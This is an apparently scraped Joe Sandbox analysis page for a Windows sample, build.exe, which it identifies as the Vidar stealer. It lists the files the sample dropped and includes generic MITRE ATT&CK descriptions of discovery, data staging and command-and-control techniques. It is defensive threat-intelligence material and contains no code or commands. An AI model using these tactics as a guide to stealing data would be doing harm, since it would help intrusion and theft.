Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report build.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Vidar

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

Protection of GUI

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\2dba1\6phdt2

C:\ProgramData\2dba1\89hl6xba1

C:\ProgramData\2dba1\8gdtjm

C:\ProgramData\2dba1\c2vkng

C:\ProgramData\2dba1\gdba16

C:\ProgramData\2dba1\k6xt0zusr

C:\ProgramData\2dba1\opz5fu

C:\ProgramData\2dba1\phdj5f

C:\ProgramData\2dba1\pph47y

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\json[1].json

Chrome Cache Entry: 60

Chrome Cache Entry: 61

Chrome Cache Entry: 62

Windows Analysis Report
build.exe

Function 0040CCEA Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 101
fileCOMMON

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may use legitimate desktop support and remote access software to establish an interactive command and control channel to target systems within networks. These services, such as `VNC`, `Team Viewer`, `AnyDesk`, `ScreenConnect`, `LogMein`, `AmmyyAdmin`, and other remote monitoring and management (RMM) tools, are commonly used as legitimate technical support software and may be allowed by application control within a target environment.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre